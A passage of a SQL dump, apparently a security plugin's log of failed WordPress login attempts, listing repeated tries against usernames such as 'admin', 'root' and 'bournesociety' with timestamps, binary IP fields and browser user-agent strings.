Firefox/62.0'),(5424,8889,1629643271.594758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5425,8889,1629643271.649805,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5426,8890,1629643502.404377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5427,8891,1629643845.886370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5428,8892,1629644157.859571,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5429,8893,1629644444.694531,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(5430,8894,1629644481.220642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5431,8895,1629644840.702974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5432,8898,1629647995.116766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5433,8900,1629650365.968592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5434,8904,1629651896.335540,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�:','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(5435,8904,1629651896.377438,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�:','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(5436,8905,1629651937.435278,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(5437,8905,1629651937.503042,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(5438,8909,1629654236.866102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5439,8910,1629655167.462922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}7�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5440,8914,1629660646.259272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5441,8915,1629661067.099639,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5442,8916,1629661067.359662,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5443,8917,1629661067.572119,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5444,8918,1629661067.805138,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5445,8919,1629661068.038297,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5446,8920,1629661068.292879,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5447,8921,1629661068.522815,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5448,8922,1629661068.756299,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5449,8923,1629661069.024668,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5450,8924,1629661069.315031,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5451,8925,1629661069.571875,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5452,8926,1629661069.805894,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5453,8927,1629661070.036838,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5454,8928,1629661070.287091,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5455,8929,1629661070.565131,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5456,8930,1629661070.834942,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5457,8931,1629661071.067606,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5458,8932,1629661071.287239,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5459,8933,1629661071.488714,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��Ú��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5460,8935,1629661488.209353,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(5461,8939,1629663145.461546,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(5462,8943,1629664806.271803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5463,8948,1629669526.403171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5464,8950,1629670718.130380,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���JL�','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),(5465,8951,1629671205.754770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5466,8953,1629672039.347281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����^','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5467,8954,1629672777.428252,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5468,8955,1629672777.653398,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5469,8956,1629672777.879110,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5470,8957,1629672778.155266,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5471,8958,1629672778.406080,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5472,8959,1629672778.662292,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5473,8960,1629672778.883313,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5474,8961,1629672779.124618,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5475,8962,1629672779.345446,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5476,8963,1629672779.567348,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5477,8964,1629672779.784640,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5478,8965,1629672780.006346,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5479,8966,1629672780.214681,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5480,8967,1629672780.403663,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5481,8968,1629672781.408028,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5482,8969,1629672781.648438,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5483,8970,1629672781.901364,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5484,8971,1629672782.156343,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5485,8972,1629672782.396630,1,'loginFailInvalidUsername','taitaweb',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5486,8974,1629672883.102242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5487,8979,1629674838.564739,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5488,8988,1629681299.835893,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(5489,8989,1629681469.044103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5490,8991,1629684079.769964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5491,8992,1629684949.799561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5492,8994,1629686658.088114,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5493,8996,1629688338.492180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����n�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5494,8997,1629689179.683555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5495,8999,1629692448.609847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5496,9001,1629694887.281131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5497,9005,1629696531.864775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n\\�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5498,9006,1629696937.187404,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5499,9007,1629697354.377192,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5500,9008,1629697542.541028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5501,9009,1629698155.716404,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B!�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5502,9010,1629698174.533707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5503,9012,1629699008.258630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5504,9015,1629700226.270220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5505,9016,1629700656.631587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(5506,9017,1629700976.281555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5507,9018,1629701485.689119,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5508,9020,1629702324.057620,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���㪽','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5509,9021,1629702489.973961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5510,9022,1629703252.505359,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5511,9025,1629704451.773203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5512,9026,1629704913.699530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5513,9026,1629704913.707267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5514,9029,1629706132.946401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5515,9030,1629706281.107773,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5516,9033,1629707439.002899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5517,9034,1629707821.710948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�A*','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5518,9035,1629708212.273483,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),(5519,9036,1629708248.160513,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���JL�','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),(5520,9037,1629708253.989327,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���JL�','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),(5521,9038,1629708303.346545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5522,9040,1629709512.629769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#~f','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(5523,9041,1629709920.442442,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5524,9041,1629709920.491333,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5525,9042,1629710068.906046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5526,9043,1629710355.974684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5527,9046,1629711863.132066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5528,9049,1629712921.733271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(5529,9051,1629713761.627648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���I�-','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5530,9053,1629714599.723870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5531,9054,1629715441.509325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5532,9057,1629716301.578727,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5533,9059,1629716484.272481,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5534,9060,1629717166.848499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5535,9064,1629718891.992350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5536,9065,1629719525.942270,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(5537,9072,1629721492.427922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5538,9074,1629723235.764541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 